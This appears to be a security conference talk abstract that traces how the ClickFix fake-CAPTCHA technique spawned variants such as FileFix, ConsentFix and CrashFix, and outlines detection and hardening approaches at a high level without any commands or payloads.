Meet the Fixers: How One Social Engineering Technique Spawned a Family and How to Catch It
Last year at LTDH I did a talk on ClickFix — the fake-CAPTCHA trick that gets users to paste malicious commands into the Run dialog. I thought I was done with the topic.
A year on, ClickFix has grown a family. FileFix moves the trick to File Explorer. ConsentFix (APT29) does it through OAuth and bypasses MFA and passkeys without ever touching the endpoint. CrashFix deliberately breaks your browser, then offers the fix. And a DPRK-nexus actor used a ClickFix-style fake job interview to compromise an Axios maintainer putting 100M weekly npm downloads in the blast radius.
Part one: how the family grew up. Part two: how we catch them — SIEM queries, Conditional Access, browser hardening, the lot. Part three: why none of this stays solved, because custom ClickFix GPTs and AI-generated lures are about to make the next variant cheaper than the last.